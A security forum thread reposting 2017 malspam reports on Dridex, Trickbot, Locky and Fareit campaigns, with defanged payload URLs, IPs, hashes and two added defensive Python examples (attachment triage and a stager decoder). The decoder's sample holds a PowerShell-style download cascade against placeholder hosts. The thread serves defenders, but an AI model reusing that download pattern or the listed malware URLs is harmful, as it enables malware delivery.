Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Payment-Slip-Copy.png

The -link- hidden behind the image goes to
http ://www.system.air-alicante .eu/lib/css/Payment508879883.jar (519kb)
Current Virus total detections 1/62*. Payload Security**... system.air-alicante .eu looks to be a compromised Virtual Airline Site that appears to have been abandoned by its owner after a server crash. It was registered by Godaddy in July 2016 to a German Registrant. Currently hosted on 206.214.223.170 ServInt AS25847 which appears to be “owned” by a reseller fivedev .net who doesn’t have any abuse or contact details... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/4237d996cdfccb66f498b3f7e674fa0b185a7f812e1c2058b75f9eb0a89ea23c/analysis/1508882800/

** https://www.hybrid-analysis.com/sample/4237d996cdfccb66f498b3f7e674fa0b185a7f812e1c2058b75f9eb0a89ea23c?environmentId=100

system.air-alicante .eu: 206.214.223.170: https://www.virustotal.com/en/ip-address/206.214.223.170/information/
> https://www.virustotal.com/en/url/7c437ec90c2c3c4142ef7b172df8a93570b0791eb4871743fd2d4e37617149ee/analysis/
___

Fake 'Payment Advice' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-payment-advice-malspam-transferdept-com-delivers-malware/
25 Oct 2017 - "... an email with the subject of 'RE: Payment Advice 2000076579' (probably random numbers, although both copies I received have the same numbers) pretending to come from OFFICE <office@ transferdept .com> with an ACE file attachment (ACE files are a lesser known form of zip file that needs special programs to unzip them. A high proportion of recipients will -not- have this software on their computer)... no idea what malware this actually is, although it is quite well detected on Virus Total as a generic malware.... As far as I can determine transferdept .com is a domain that is up for sale and has no website etc associated with it...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Payment-Advice-2000076579.png

PAYMENT.ace (VirusTotal 10/59*): Extracts to: PAYMENT.exe Current Virus total detections 28/67**.
Payload Security[3]... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/258600ef266cf9c0ae6634e606d30a34646e2230c2513c818fb982b11397d3fe/analysis/1508921444/

** https://www.virustotal.com/en/file/e527d71664b1e3fcf2fcfd4b4d300dbb227bd5b9ff48353397461f85ebfb629b/analysis/1508933216/
PAYMENT.exe

3] https://www.hybrid-analysis.com/sample/e527d71664b1e3fcf2fcfd4b4d300dbb227bd5b9ff48353397461f85ebfb629b?environmentId=100
Contacted Hosts
216.58.209.238

transferdept .com: A temporary error occurred during the lookup...
___

Fake 'Sage invoice' SPAM - delivers Dridex
- https://myonlinesecurity.co.uk/fake-your-sage-subscription-invoice-delivers-dridex-banking-trojan/
25 Oct 2017 - "... an email with the subject of 'Your Sage subscription invoice is ready' pretending to come from Sage which delivers Dridex banking trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Your-Sage-subscription-invoice-is-ready_-email.png

... The link-in-the-email goes to a -compromised- or fraudulently set up OneDrive for business/ SharePoint site where a zip file containing a .js file is downloaded. That eventually downloads the Dridex banking Trojan:
https ://tailoredpackaging-my.sharepoint .com/personal/bec_tailoredpackaging_com_au/_layouts/15/guestaccess.aspx?docid=0b5a1a2799b6e419daf97f646640e195b&authkey=AduyYkbo5mf9IESLsGPE6yk

Sage subscription invoice.zip: Extracts to: Sage subscription invoice.js Current Virus total detections 2/59*
Payload Security** | Dridex Payload VirusTotal 13/67[3]| Payload Security[4]... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/da2986ad7dff9a406a1606716b4ba2a27189ebe34dc80cadbc7ec3836b64e169/analysis/1508929523/
Sage subscription invoice.js.bin

** https://www.hybrid-analysis.com/sample/da2986ad7dff9a406a1606716b4ba2a27189ebe34dc80cadbc7ec3836b64e169?environmentId=100
DNS Requests
104.146.164.67
Contacted Hosts
199.21.115.94
162.243.137.50
173.214.174.107
104.236.49.165

3] https://www.virustotal.com/en/file/fc40d3f0fad65e6833b4b839d2c332693cd31eb4cc2fae7fe5cd387e6daa61f0/analysis/1508933673/
mvrdcoqbki2.exe

4] https://www.hybrid-analysis.com/sample/f24354e54e4b59f6c327b1f7e144092647e726505acde5595a8386e7c2c6fa8a?environmentId=100
Contacted Hosts
199.21.115.94
162.243.137.50
173.214.174.107
104.236.49.165

tailoredpackaging-my.sharepoint .com: 104.146.164.27: https://www.virustotal.com/en/ip-address/104.146.164.27/information/

:fear::fear: :mad:

AplusWebMaster
2017-10-26, 14:55
FYI...

Fake 'TRANSFER PAYMENT ERROR' SPAM - delivers malware
- https://myonlinesecurity.co.uk/transfer-payment-error-urgent-attention-malspam-delivers-malware/
26 Oct 2017 - "... an email with the subject of 'TRANSFER PAYMENT ERROR (URGENT ATTENTION!!!)' pretending to come from OFFICE <office@ transferdept .com> with an ACE file attachment (ACE files are a lesser known form of zip file that needs special programs to unzip them. A high proportion of recipients will not have this software on their computer). Yesterday we saw a similar malspam campaign using the same-email details spoofing transferdept .com[1]... not sure what malware this actually is, although it is quite well detected on Virus Total as a generic malware. It is most probably Fareit trojan...
1] https://myonlinesecurity.co.uk/fake-payment-advice-malspam-transferdept-com-delivers-malware/

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/TRANSFER-PAYMENT-ERROR-URGENT-ATTENTION-email.png

PAYMENT ADVICE.ace (VirusTotal 19/59*): Extracts to: PAYMENT ADVICE.exe
- Current Virus total detections 29/66**. Payload Security***... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c85a4ac5918b00e4cfe12cca358bbb9def3618b8018c066a90a509b10dccc8f4/analysis/1509003325/

** https://www.virustotal.com/en/file/65e909bf8605f223ba3e7ba461e01d2285ec453301dca71e86196f80d3289480/analysis/1509008143/
PAYMENT ADVICE.exe

*** https://www.hybrid-analysis.com/sample/65e909bf8605f223ba3e7ba461e01d2285ec453301dca71e86196f80d3289480?environmentId=100
___

Fake 'Invoice' SPAM - delivers Fareit trojan
- https://myonlinesecurity.co.uk/more-fake-invoices-with-an-r23-file-extension-delivers-fareit-trojan/
26 Oct 2017 - "... an email with the subject of 'Re: Invoice' pretending to come from Sales (random names and email addresses) delivers Fareit/Pony trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/re-invoice_email.png

NEW INVOICE.R23 (113kb): Extracts to: NEW INVOICE .com (which is an absolutely massive 11.5MB in size)
Current Virus total detections 14/66*. Payload Security**| tries to contact
http ://laximdiamond .com/fta/panel/shit.exe (which gives a 404) however there is an open directory
http ://laximdiamond .com/fta/panel/ where we see this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/laximdiamond.png
It should be noted that this file has an invalid Microsoft Digital signature that expired in 2011:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/new-invoice-invalid-Microsoft-digiatl-signature.png

The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/0f7f7ce1ab76f3588d806d0a4effea05d943aa0067924c3bce16163c5600daff/analysis/
daff.exe
Additional Information:
File names: Madhavan.exe
daff.exe
NEW INVOICE .com
Madhavan
NEW INVOICE .com

** https://www.hybrid-analysis.com/sample/0f7f7ce1ab76f3588d806d0a4effea05d943aa0067924c3bce16163c5600daff?environmentId=100
DNS Requests
45.122.138.22
Contacted Hosts
45.122.138.22

laximdiamond .com: 45.122.138.22: https://www.virustotal.com/en/ip-address/45.122.138.22/information/
> https://www.virustotal.com/en/url/7d488f9de61f649840cf2f1f16acc212517f7cf144f2efc5456e1fda95996c4d/analysis/
___

Fake 'account documents' SPAM - delivers Trickbot via DDE exploit
- https://myonlinesecurity.co.uk/fake-lloyds-bank-your-account-documents-deliver-trickbot-banking-trojan-via-the-dde-exploit/
26 Oct 2017 - "... using the DDE exploit[1] to perform malware campaigns... today the Trickbot gang have got in on the act with an email with the subject of 'Your account documents' pretending to come from Lloyds Bank but actually coming from a look-a-like domain <noreply@ lloydsbankdownload .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...
1] https://www.bleepingcomputer.com/news/security/microsoft-office-attack-runs-malware-without-needing-macros/

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Lloyds-Bank-Your-account-documents-email.png

> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Documents_docx.png

Documents.docx - Current Virus total detections 4/58*. Payload Security**...
This malware docx file downloads from
http ://preview.tastymovies .com/moviefiles/lorangosor.png which of course is -not- an image file but a renamed .exe file that gets renamed to ect.exe (VirusTotal 12/67***)
Today’s example of the spoofed domain is, as usual, registered via Godaddy as registrar using privacy protection services.
lloydsbankdownload .com is hosted on numerous servers and IP addresses and sends the emails via 185.106.121.26 smtp3.wow-me .org | 95.211.213.219 | 185.2.81.3 | 213.152.162.231 | All of which are based in Netherlands... DO NOT follow the advice they give to enable macros or enable editing to see the content...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/48115dc13a65640f433a4b584c5838b7173b08ea58e2ebba12dc23a10fe60c52/analysis/1509019722/
ec4b69380c33a9fa2b0145ed0b118ef2.doc

** https://www.hybrid-analysis.com/sample/48115dc13a65640f433a4b584c5838b7173b08ea58e2ebba12dc23a10fe60c52?environmentId=100
DNS Requests
37.120.182.208
69.12.77.100
Contacted Hosts
69.12.77.100
37.120.182.208
195.133.146.122
194.87.235.112

*** https://www.virustotal.com/en/file/c12fb1c35c7d816729fad821c0506bc5492bf7565e2b3d0ccd28c571b3de5d5a/analysis/

smtp3.wow-me .org: A temporary error occurred during the lookup...

lloydsbankdownload .com: 95.211.213.219
185.2.81.3
213.152.162.231
185.106.121.26

tastymovies .com: 69.12.77.100: https://www.virustotal.com/en/ip-address/69.12.77.100/information/
> https://www.virustotal.com/en/url/1ad947dac30f8b79119f51d4d167ee0c4ee1614b12b618c16d8d0b14a3d27b03/analysis/
___

Fake 'RBS bank line secure email' SPAM - delivers Trickbot via DDE exploit
- https://myonlinesecurity.co.uk/fake-rbs-bank-line-secure-email-delivers-trickbot-via-dde-exploit/
26 Oct 2017

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/New-Secure-Message-Royal-Bank-of-Scotland-RBS-bank-line-secure-email.png

> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/rbs189582981224-124533._docx.png

DO NOT follow the advice they give to enable macros or enable editing to see the content...
The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."

(More detail at the myonlinesecurity.co.uk URL above. )

:fear::fear: :mad:
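
The 24 to 26 Oct posts above share one perimeter problem: an executable with an Office icon inside a zip, a file named .PDF.z.exe or .doc.z that is really a PE, and .ace / .r23 archives most recipients cannot even open. The following is an added example, not code from the quoted posts or from any mail gateway: a stdlib-only Python triage routine that judges an attachment by its extension chain and by its magic bytes rather than by its name alone, recurses into zips, and reports why something should be quarantined. The attachment names and bytes at the bottom are constructed stand-ins (a bare DOS-header stub, not a real program) so it runs offline.

```python
"""Added example (not from the quoted posts): perimeter triage of a mail
attachment by name and by magic bytes, so "Quotation.exe with an Excel icon",
"SCAN_PO.PDF.z.exe", a .z that is really a PE, or an .ace/.r23 archive are
flagged before a user sees them.  Stdlib only; all samples are constructed."""
import io
import re
import zipfile

MAGIC = [                                   # (signature, offset, kind)
    (b"PK\x03\x04", 0, "zip"),
    (b"Rar!\x1a\x07", 0, "rar"),
    (b"7z\xbc\xaf\x27\x1c", 0, "7z"),
    (b"**ACE**", 7, "ace"),                 # ACE keeps its marker at offset 7
    (b"\x1f\x8b", 0, "gzip"),
    (b"MZ", 0, "pe"),
    (b"%PDF", 0, "pdf"),
]
ARCHIVE_KINDS = {"zip", "rar", "7z", "ace", "gzip"}
EXEC_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".js", ".jse",
             ".vbs", ".vbe", ".wsf", ".hta", ".jar", ".ps1"}
DOC_LIKE = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
ARCHIVE_EXTS = {".zip": {"zip"}, ".rar": {"rar"}, ".7z": {"7z"},
                ".ace": {"ace"}, ".gz": {"gzip"}, ".z": ARCHIVE_KINDS}
RAR_VOLUME = re.compile(r"\.r\d\d$")        # .r00 .. .r99 are RAR volume parts
MAX_MEMBER = 20 * 1024 * 1024               # do not inflate zip bombs


def sniff(data):
    """Identify content by magic bytes, ignoring the file name entirely."""
    for sig, off, kind in MAGIC:
        if data[off:off + len(sig)] == sig:
            return kind
    return "unknown"


def ext_chain(name):
    """'SCAN_PO.PDF.z.exe' -> ['.pdf', '.z', '.exe'] (case-folded)."""
    base = name.rsplit("/", 1)[-1].lower()
    return ["." + p for p in base.split(".")[1:]]


def triage(name, data, depth=0, path=None):
    """Return [(path, reason)] findings for one attachment, recursing into zips."""
    path = path or name
    chain = ext_chain(name)
    ext = chain[-1] if chain else ""
    kind = sniff(data)
    findings = []
    if ext in EXEC_EXTS or kind == "pe":
        findings.append((path, f"executable content (type {kind}, extension {ext or 'none'})"))
    if len(chain) > 1 and any(e in DOC_LIKE for e in chain[:-1]):
        findings.append((path, f"double extension: shown as {chain[0]} when extensions are hidden"))
    expected = {"rar"} if RAR_VOLUME.match(ext) else ARCHIVE_EXTS.get(ext)
    if expected is not None and kind not in expected:
        findings.append((path, f"extension {ext} but content is {kind}"))
    if ext == ".ace" or RAR_VOLUME.match(ext):
        findings.append((path, f"{ext} needs a third-party unpacker; rarely legitimate in mail"))
    if kind == "zip" and depth < 2:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = z.namelist()
            if "META-INF/MANIFEST.MF" in names:
                findings.append((path, "zip is a Java archive (runs with java -jar)"))
            for member in names:
                if member.endswith("/") or z.getinfo(member).file_size > MAX_MEMBER:
                    continue
                findings += triage(member, z.read(member), depth + 1, f"{path}:{member}")
    return findings


# --- constructed samples (stand-ins, not the real attachments) ---------------
def _pe_stub():
    return b"MZ" + b"\x00" * 62              # DOS header magic only, not a program


def _zip_with(member, data):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(member, data)
    return buf.getvalue()


SAMPLES = {
    "Quotation.zip": _zip_with("Quotation.exe", _pe_stub()),
    "Purchase order comfirmation.doc.z": _pe_stub(),
    "NEW INVOICE.R23": b"Rar!\x1a\x07\x00" + b"\x00" * 16,
    "PAYMENT.ace": b"\x00" * 7 + b"**ACE**" + b"\x00" * 16,
    "invoice.pdf": b"%PDF-1.4\n",
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, "->", triage(name, data) or "clean")
```

The point of checking magic before extension is the dynamoo observation that the .z archive did not match its extension: a name-only rule passes it, a content rule does not. Wire `triage` into a milter or gateway hook and quarantine on any finding; the .ace and .rNN rules implement the advice in the same post that you probably do not need to accept those formats at all.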

AplusWebMaster
2017-10-31, 15:21
FYI...

Fake 'Invoice' SPAM - delivers Locky via word docs with embedded OLE objects
- https://myonlinesecurity.co.uk/blank-emails-with-fake-invoice-attachments-deliver-locky-ransomware-via-word-docs-with-embedded-ole-objects/
31 Oct 2017 - "... another change in the Necurs botnet malspam delivery that normally delivers Locky ransomware or Trickbot banking trojan. After a week or so of using the DDE exploit, today they have switched back to embedded-OLE-objects inside a word doc... The emails pretend to be invoices with a completely empty-blank-body... The word doc contains an embedded PowerShell -script- that runs when you follow their prompts to double-click-the-image. This contacts a remote server where it opens in memory (without saving to the disc in any obvious way) a set of instructions to contact a list-of-urls in turn, until one responds, to download a small file...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Invoice-INV0000808_email.png

The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Invoice-INV0000808_doc.png

Invoice INV0000808.doc - Current Virus total detections 5/61*. Payload Security** contacts
http ://christakranzl .at/eiuhf384 where it downloads to memory a set of instructions that give
these 6 urls:
"http ://projex-dz .com/i8745fydd",
"http ://celebrityonline .cz/i8745fydd",
"http ://sigmanet .gr/i8745fydd",
"http ://apply.pam-innovation .com/i8745fydd",
"http ://bwos .be/i8745fydd",
"http ://zahntechnik-imlau .de/i8745fydd"
... Using a UK based IP number, this delivered requ4.exe which is an old well known remote admin tool Netcat. (VirusTotal 48/67[3])... using a USA based IP via a proxy, I also got requ4.exe (from the same urls) but a totally different version that looks like Locky ransomware (VirusTotal 15/66[4]) (Payload Security[5])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/b510684253a4142aec0a3cf8f8bd13b551408917ac98cce6bde1a480ebc56532/analysis/1509442810/

** https://www.hybrid-analysis.com/sample/b510684253a4142aec0a3cf8f8bd13b551408917ac98cce6bde1a480ebc56532?environmentId=100
DNS Requests
88.198.9.176
5.196.81.12
Contacted Hosts
88.198.9.176
5.196.81.12

3] https://www.virustotal.com/en/file/7379c5f5989be9b790d071481ee4fdfaeeb0dc7c4566cad8363cb016acc8145e/analysis/1509448777/
nc.exe

4] https://www.virustotal.com/en/file/d97be402740f6a0fc70c90751f499943bf26f7c00791d46432889f1bedf9dbd2/analysis/1509452021/
requ4.exe

5] https://www.hybrid-analysis.com/sample/d97be402740f6a0fc70c90751f499943bf26f7c00791d46432889f1bedf9dbd2?environmentId=100
DNS Requests
77.93.62.179
Contacted Hosts
77.93.62.179

5.196.81.12: https://www.virustotal.com/en/ip-address/5.196.81.12/information/
> https://www.virustotal.com/en/url/4fd9ed5cc7e7adeb69f7b047e2839952af863e5a48749dd6cf94f57162ad71de/analysis/

88.198.9.176: https://www.virustotal.com/en/ip-address/88.198.9.176/information/
> https://www.virustotal.com/en/url/c253532d0025b938e18360fcaaaa445d5a624b65413579c34be2847bea9c66b5/analysis/

:fear::fear: :mad:
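
Both the 24 Oct and 31 Oct Locky posts describe the same first stage: the document fetches a base64 string, decodes it in memory, and walks a list of URLs in turn until one answers. When you have that string from a sandbox run or a proxy log, the analyst's job is to decode it and turn the URL list into IOCs. The following is an added example, not code from myonlinesecurity.co.uk: a stdlib-only Python decoder that handles both UTF-8 and UTF-16LE (the encoding PowerShell -EncodedCommand uses), extracts the URLs in the order the downloader would try them, and defangs them in the same "http ://host .tld" style the posts use. The blob it decodes is a constructed PowerShell-style stager on reserved example.net/.org/.com names, not a real sample.

```python
"""Added example (not from the quoted posts): decode the base64 "instructions"
blob a DDE/OLE downloader fetches and pull out the URL list it tries in turn.
Stdlib only; the sample input below is constructed, not a real stager."""
import base64
import re

URL_RE = re.compile(r"""https?://[^\s'"`,;<>()\]\[]+""", re.IGNORECASE)


def decode_base64_text(blob):
    """Base64-decode a blob and return it as text.

    PowerShell -EncodedCommand and some stagers use UTF-16LE rather than
    UTF-8; ASCII text in UTF-16LE has a NUL in every second byte, so use the
    NUL density to pick the decoding."""
    raw = base64.b64decode("".join(blob.split()))
    if raw.count(b"\x00") > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def extract_urls(text):
    """Return the URLs in order of first appearance, without duplicates."""
    seen, urls = set(), []
    for m in URL_RE.finditer(text):
        u = m.group(0).rstrip(".")
        if u not in seen:
            seen.add(u)
            urls.append(u)
    return urls


def defang(url):
    """Write a URL the way the quoted posts do: 'http ://host .tld/path'."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    head, dot, tld = host.rpartition(".")
    host = f"{head} .{tld}" if dot else host
    return f"{scheme} ://{host}{sep}{path}"


def stager_report(blob):
    """Decode a stager blob and return its download list, defanged, in the
    order the downloader would try them (first responding host wins)."""
    return [defang(u) for u in extract_urls(decode_base64_text(blob))]


# --- constructed sample: a PowerShell-style download cascade -----------------
SCRIPT = ('$u="http://stager1.example.net/kjhgFG","http://stager2.example.org/kjhgFG",'
          '"http://stager3.example.com/p66/kjhgFG";'
          'foreach($x in $u){try{(New-Object Net.WebClient).DownloadString($x);break}catch{}}')
BLOB_UTF8 = base64.b64encode(SCRIPT.encode("utf-8")).decode("ascii")
BLOB_UTF16 = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")

if __name__ == "__main__":
    for label, blob in (("utf-8", BLOB_UTF8), ("utf-16le", BLOB_UTF16)):
        print(label, stager_report(blob))
```

The ordering matters for blocking: the downloader stops at the first host that answers, so a proxy log will usually show only one of the six URLs, while the decoded list gives you all of them to block at once. `decode_base64_text` picks the encoding from the bytes rather than trusting the source, since the same campaign has shipped both forms.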

AplusWebMaster
2017-11-03, 14:49
FYI...

Banking Trojan targets Google Search Results (SEO)
- http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html
Nov 2, 2017 - "It has become common for users to use Google to find information that they do not know. In a quick Google search you can find practically anything you need to know. Links returned by a Google search, however, are not guaranteed to be safe. In this situation, the threat actors decided to take advantage of this behavior by using Search Engine Optimization (SEO) to make their malicious links more prevalent in the search results, enabling them to target users with the Zeus-Panda-banking-Trojan. By poisoning the search results for specific banking related keywords, the attackers were able to effectively target specific users in a novel fashion. By targeting primarily financial-related keyword searches and ensuring that their -malicious- results are displayed, the attacker can attempt to maximize the conversion rate of their infections as they can be confident that infected users will be regularly using various financial platforms and thus will enable the attacker to quickly obtain credentials, banking and credit card information, etc. The overall configuration and operation of the infrastructure used to distribute this malware was interesting as it did not rely on distribution methods that Talos regularly sees being used for the distribution of malware. This is another example of how attackers regularly refine and change their techniques and illustrates why ongoing consumption of threat intelligence is essential for ensuring that organizations remain protected against new threats over time... The initial vector used to initiate this infection process does not appear to be email based. In this particular campaign, the attacker(s) targeted specific sets of search keywords that are likely to be queried by potential targets using search engines such as Google. 
By leveraging compromised web servers, the attacker was able to ensure that their malicious results would be ranked highly within search engines, thus increasing the likelihood that they would be clicked on by potential victims...
Having a sound, layered, defense-in-depth strategy in place will help ensure that organizations can respond to the constantly changing threat landscape. Users, however, must also remain vigilant and think twice before clicking-a-link, opening-an-attachment or even blindly trusting the results of a Google search..."
IPs Distributing Maldocs:
67.195.61.46: https://www.virustotal.com/en/ip-address/67.195.61.46/information/
C2 IP Addresses:
82.146.59.228: https://www.virustotal.com/en/ip-address/82.146.59.228/information/
(More detail at the talosintelligence URL above.)
___

'Coin Miner' Malware - hits Google Play
- http://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/
Oct 30, 2017 - "... Recently, we found apps with -malicious- cryptocurrency mining-capabilities on Google Play. These apps used dynamic JavaScript loading and native code injection to avoid detection. We detect these apps as ANDROIDOS_JSMINER and ANDROIDOS_CPUMINER. This is not the first time we’ve found these types of apps on app stores. Several years ago, we found -malicious- apps on the Google-Play-store detected as ANDROIDOS_KAGECOIN, a malware family with hidden-cryptocurrency-mining capabilities:
> https://www.gdatasoftware.com/blog/2014/02/23969-android-malware-goes-to-the-moon
... We’ve previously seen tech support scams** -and- compromised websites used to deliver the Coinhive JavaScript cryptocurrency miner to users. However, we’re now seeing apps used for this purpose, which we detect as ANDROIDOS_JSMINER.
** http://blog.trendmicro.com/trendlabs-security-intelligence/eitest-campaign-uses-tech-support-scams-deliver-coinhives-monero-miner/
We found two apps; one supposedly helps users pray the rosary, while the other provides discounts of various kinds:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2017/10/android-mining-1.png
...
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2017/10/android-mining-2.png
Both of these samples do the same thing once they are started: they will load the JavaScript library code from Coinhive and start mining with the attacker’s own site key... This JavaScript code runs within the app’s webview, but this is -not- visible to the user because the webview is set to run in -invisible- mode by default... Another family of malicious apps takes -legitimate-versions- of apps and adds mining libraries, which are then repackaged and distributed. We detect these as ANDROIDOS_CPUMINER. One version of this malware is in Google Play and disguised as a wallpaper application:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2017/10/android-mining-5.png
These threats highlight how even mobile devices can be used for cryptocurrency mining activities, even if, in practice, the effort results in an insignificant amount of profit. Users should take note of -any- performance degradation on their devices after installing an app. We have reached out to Google, and the apps mentioned in this post are no longer on Google Play..."

Related posts: http://blog.trendmicro.com/trendlabs-security-intelligence/bankbot-found-google-play-targets-ten-new-uae-banking-apps/

> http://blog.trendmicro.com/trendlabs-security-intelligence/eitest-campaign-uses-tech-support-scams-deliver-coinhives-monero-miner/

> http://blog.trendmicro.com/trendlabs-security-intelligence/leakerlocker-mobile-ransomware-threatens-expose-user-information/

> http://blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-uses-wmi-eternalblue-spread-filelessly/
"... Conclusion: Fileless attacks are becoming more common. Threat actors are increasingly using attack methods that work directly from memory and use legitimate tools or services*. In this case, WMI subscriptions have been used by this cryptocurrency-mining malware as its -fileless- persistence mechanism. Since there are no malware files on the hard drive, it’s more difficult to detect..."
* Fileless Threats that Abuse PowerShell
> https://www.trendmicro.com/vinfo/us/security/news/security-technology/security-101-the-rise-of-fileless-threats-that-abuse-powershell

:fear::fear: :mad:

AplusWebMaster
2017-11-07, 12:48
FYI...

Fake 'invoice' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-invoice-from-nxdocumentsend-at-your-own-email-address-delivers-locky-ransomware/
7 Nov 2017 - "... an email with a subject of 'Invoice #231910390' (random numbers) pretending to come from XXDocumentSend at your own email address or company domain... Once again the word doc contains an embedded OLE object that when clicked on opens a PowerShell script which contacts a remote server & get a text string which contains a set of instructions to contact a list of urls in turn, until one responds, to download the main Locky ransomware or Trickbot binary...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/Invoice-231910390-email.png

... over the last couple of weeks or so the downloaders from the Necurs botnet used system fingerprinting to decide which malware to give to any victim. Certain countries and IP ranges got Locky, others got Trickbot banking trojan. I am pretty sure that these Word embedded OLE downloaders and the downloaders will also be using the same techniques:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/word-doc-with-embeded-ole-object.png

115403772_11_07_2017_14_87_41.doc - Current Virus total detections 11/60*. Payload Security** | contacts
‘http ://gotcaughtdui .com/693’ where it downloads to memory the text string which contains these 6 urls
"http ://teesaddiction .com/JHgd3Dees“,
”http ://christaminiatures .nl/JHgd3Dees“,
”http ://336.linux1.testsider .dk/JHgd3Dees“,
”http ://florastor .net/JHgd3Dees“,
”http ://heinzig .info/JHgd3Dees“,
”http ://muchinfaket .net/p66/JHgd3Dees”
This delivers wera4.exe (VirusTotal 10/66[3]) (Payload Security[4])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/2389ecc421ef80711344174f11f07cd68502ea1723630d46c014640156bc04bd/analysis/1510048862/
115403772_11_07_2017_14_87_41.doc

** https://www.hybrid-analysis.com/sample/2389ecc421ef80711344174f11f07cd68502ea1723630d46c014640156bc04bd?environmentId=100

3] https://www.virustotal.com/en/file/28df46fe9876341394f8f0e4dcf17bd76f451ea8347104470acb59291f1735ce/analysis/

4] https://www.hybrid-analysis.com/sample/28df46fe9876341394f8f0e4dcf17bd76f451ea8347104470acb59291f1735ce?environmentId=100
___

Fake 'eFax' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/fake-you-have-a-new-highly-encrypted-secure-fax-from-efax-malspam-delivers-trickbot-banking-trojan/
7 Nov 2017 - "An email with the subject of 'You have a new fax' pretending to come from eFax Corporate but actually coming from a look-a-like domain <message@ efax-secure .com> with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/fake-You-have-a-new-highly-encrypted-secure-fax-from-eFax.png

Today’s examples of the spoofed domains are, as usual, registered via Godaddy as registrar.
efax-secure .com hosted on and sending the emails via 134.19.180.224 hosted-by .rapidrdp .com AS49453 Global Layer B.V. | 95.211.214.251 AS60781 LeaseWeb Netherlands B.V.| 185.106.121.147 free.hostsailor .com AS60117 Host Sailor Ltd. | 185.2.81.10 guish.elvb-listverify .com AS49981 WorldStream B.V. |

HighlyEncryptedFax.doc - Current Virus total detections 3/59*. Payload Security**
This malware file downloads from
http ://styleof.co .uk/ser1107.png which of course is -not- an image file but a renamed .exe file that gets renamed to Hmmd.exe (VirusTotal 8/61[3]). An alternative download location is
http ://tablet-counter .com/ser1107.png
This email -attachment- contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/11/HighlyEncryptedFax_doc.png
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/eb0c0d977c9c48528181640384aec3eff83dbd0d7ad8cbb9cfa4fcc1d17cd7a2/analysis/1510053544/
HighlyEncryptedFax.doc

** https://www.hybrid-analysis.com/sample/eb0c0d977c9c48528181640384aec3eff83dbd0d7ad8cbb9cfa4fcc1d17cd7a2?environmentId=100

3] https://www.virustotal.com/en/file/c7a3123a5cff9c78e2fd926c6800a6c6431c8bca486ce11319a9a8f6fa83945c/analysis/1493725297/
Epvuyf.exe

:fear::fear: :mad:

AplusWebMaster
2017-11-08, 17:33
FYI...

Fake 'eFax' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/trickbot-banking-trojan-continues-to-be-delivered-via-fake-efax-messages/
8 Nov 2017 - "... this week the Trickbot gangs have decided to continue with -imitating- eFax to distribute their malware. Unlike yesterday’s version[1], which looked quite realistic, today’s version is quite a pale imitation...
1] https://myonlinesecurity.co.uk/fake-you-have-a-new-highly-encrypted-secure-fax-from-efax-malspam-delivers-trickbot-banking-trojan/
This example, an email with the subject of 'You have received a fax message' pretending to come from eFax but actually coming from a series of look-a-like domains <noreply@ faxmessage*** .ml> (*** = 1 to 599) with a malicious word doc attachment, is the second of today’s spoofs of a well-known company, bank or public authority delivering Trickbot banking Trojan...

